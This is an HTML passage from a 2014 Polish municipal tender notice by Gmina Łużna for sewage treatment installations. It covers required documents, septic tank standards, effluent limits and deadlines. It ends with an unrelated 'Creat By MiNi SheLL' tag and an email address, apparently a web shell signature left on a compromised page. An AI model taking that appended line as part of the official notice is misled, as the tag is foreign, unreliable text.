<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający żąda, złożenia wraz z ofertą dokumentów potwierdzających, że oferowane roboty budowlane odpowiadają określonym przez niego wymaganiom. W tym celu do oferty należy załączyć: 
1. Opisy wraz z danymi technicznymi, technologicznymi oraz rysunkami technicznymi proponowanych urządzeń
2. Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, w tym:
a)	Deklaracja właściwości użytkowych osadnika gnilnego z normą EN PN 12566-1:2004/A1:2006 oraz wstępne badania typu osadnika gnilnego, tj. pojemność nominalną, szczelność, wytrzymałość konstrukcji - badanie w wykopie lub badanie obliczeniowe, wykonane przez podmiot uprawniony do kontroli jakości - notyfikowane laboratorium przez Komisję Europejską
b)	Aprobata techniczna oferowanego systemu infiltracyjnego
c)	Aprobata techniczna studzienek przepompowni
d)	Badanie oferowanego przez Wykonawcę systemu oczyszczania ścieków, wskazujące stopień redukcji pomiędzy ściekami surowymi a oczyszczonymi. W/w badanie musi być wykonane przez akredytowane/notyfikowane laboratorium, potwierdzać rodzaj zastosowanych urządzeń, a także musza legitymować się najwyższymi dopuszczalnymi wartościami wskaźników zanieczyszczeń dla oczyszczonych ścieków:
Pięciodobowe biochemiczne zapotrzebowanie tlenu (BZT5) - 40 mg O2/l
Chemiczne zapotrzebowanie tlenu (ChZT) - 150 mg O2/l
Zawiesiny ogólne - 50 mg/l
Azot ogólny - 30 mg/l
e)	Raport z badań wykonany przez jednostkę notyfikowaną, potwierdzający, że konstrukcja osadnika gnilnego zapewnia wytrzymałość na nasyp gruntem o wysokości 1,2 metra wraz ze zwierciadłem wód gruntowych sięgającym połowy wysokości osadnika</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ).
2)Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.
 3)W przypadku podwykonawstwa należy złożyć wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcy (wg wzoru podanego w załączniku nr 14)
4) Kserokopię dowodu wniesienia wadium - w przypadku wniesienia wadium w postaci pieniężnej lub oryginał dokumentu potwierdzającego wniesienie wadium - w przypadku wnoszenia wadium w innej formie niż pieniężna,
5) Zaakceptowany  projekt umowy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość  zmiany terminu realizacji przedmiotu zamówienia, w przypadku zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy oraz w przypadku zmiany umowy z Instytucją Zarządzającą PROW na lata 2007-2013 lub zaleceniami tejże instytucji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP Gminy Łużna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łużna, 38-322 Łużna 634, pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 09:00, miejsce: Urząd Gminy Łużna, 38-322 Łużna 634, pok. 111 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com